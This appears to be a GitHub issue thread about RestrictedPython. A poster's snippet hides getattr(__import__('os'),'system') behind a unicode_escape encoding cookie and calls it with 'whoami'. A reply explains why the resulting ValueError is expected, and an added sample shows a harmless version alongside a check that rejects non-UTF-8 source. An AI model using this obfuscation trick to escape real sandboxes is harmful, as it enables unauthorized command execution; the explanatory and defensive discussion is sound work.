Open jsmith173 opened 7 months ago
jsmith173 wrote at 2024-3-25 00:13 -0700:
> I've the following code
> # encoding: unicode_escape
> a1,srt_rce,a2 = ''' \u0027\u0027\u0027\u002C\u0067\u0065\u0074\u0061\u0074\u0074\u0072\u0028\u005F\u005F\u0069\u006D\u0070\u006F\u0072\u0074\u005F\u005F\u0028\u0027\u006F\u0073\u0027\u0029\u002C\u0020\u0027\u0073\u0079\u0073\u0074\u0065\u006D\u0027\u0029\u002C\u0027\u0027\u0027 '''
> ...
> The protector code raises ValueError "too many values to unpack (expected 3)" in exec
When I look at the code above, I would say ValueError is correct: The right hand side is a string with more than 3 characters, the left hand side wants 3 objects; ValueError is the expected outcome.
> ...
> My question: Is this exception normal?
Yes.
> Why is the original code not executed?
It is but the "execution" of a string literal is the string literal.
> What to do when I want to execute this code?
You do not put expressions into a string when you want the expressions evaluated (unless you use the string as source code for a compilation; in this case, however, you should show us the compilation code).
I've the following code
# encoding: unicode_escape
a1,srt_rce,a2 = ''' \u0027\u0027\u0027\u002C\u0067\u0065\u0074\u0061\u0074\u0074\u0072\u0028\u005F\u005F\u0069\u006D\u0070\u006F\u0072\u0074\u005F\u005F\u0028\u0027\u006F\u0073\u0027\u0029\u002C\u0020\u0027\u0073\u0079\u0073\u0074\u0065\u006D\u0027\u0029\u002C\u0027\u0027\u0027 '''
srt_rce('whoami')
The unicode escape is: ''',getattr(__import__('os'), 'system'),'''
The protector code raises ValueError "too many values to unpack (expected 3)" in exec.
In my protector code I have:
"_iter_unpack_sequence_": RestrictedPython.Guards.guarded_iter_unpack_sequence,
"_unpack_sequence_": RestrictedPython.Guards.guarded_unpack_sequence,
My question: Is this exception normal? Why is the original code not executed? What to do when I want to execute this code?
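The behaviour described in the reply, as an added example that is not code from the thread or from RestrictedPython: a coding cookie only takes effect when Python decodes bytes, so str source keeps the escapes inside the string literal, and a sandbox front end can refuse bytes source that declares anything but UTF-8. The sample is constructed with a harmless escaped payload (`len`), the function names are hypothetical, and the built-in `compile`/`exec` stand in for the poster's protector.

```python
import codecs
import io
import tokenize

# Constructed sample: same shape as the snippet in the thread, but the escaped
# text is the harmless  ''',len,'''  instead of the original payload.
SAMPLE = (
    "# encoding: unicode_escape\n"
    "a1, f, a2 = ''' \\u0027\\u0027\\u0027\\u002C\\u006C\\u0065\\u006E"
    "\\u002C\\u0027\\u0027\\u0027 '''\n"
)

ALLOWED = {"utf-8", "utf-8-sig"}  # assumption: the sandbox accepts only UTF-8


def declared_encoding(source: bytes) -> str:
    """Encoding a bytes source declares via PEP 263 cookie or BOM."""
    return tokenize.detect_encoding(io.BytesIO(source).readline)[0]


def normalize_source(source) -> str:
    """Return str source for compile(); refuse bytes with a non-UTF-8 cookie."""
    if isinstance(source, str):
        return source  # compile() ignores the cookie for str input
    enc = declared_encoding(source)
    if enc not in ALLOWED:
        raise ValueError(f"refusing source with declared encoding {enc!r}")
    return source.decode(enc)


def run_as_text(source: str) -> str:
    """Execute str source with empty builtins and report the outcome."""
    try:
        exec(compile(source, "<sample>", "exec"), {"__builtins__": {}})
    except ValueError as exc:
        return f"ValueError: {exc}"
    return "ok"


def decoded_view(source: bytes) -> str:
    """Text after unicode_escape decoding, for human review only."""
    return codecs.decode(source, "unicode_escape")


if __name__ == "__main__":
    print(run_as_text(SAMPLE))            # string literal, unpack fails
    print(decoded_view(SAMPLE.encode()))  # what the escapes spell out
```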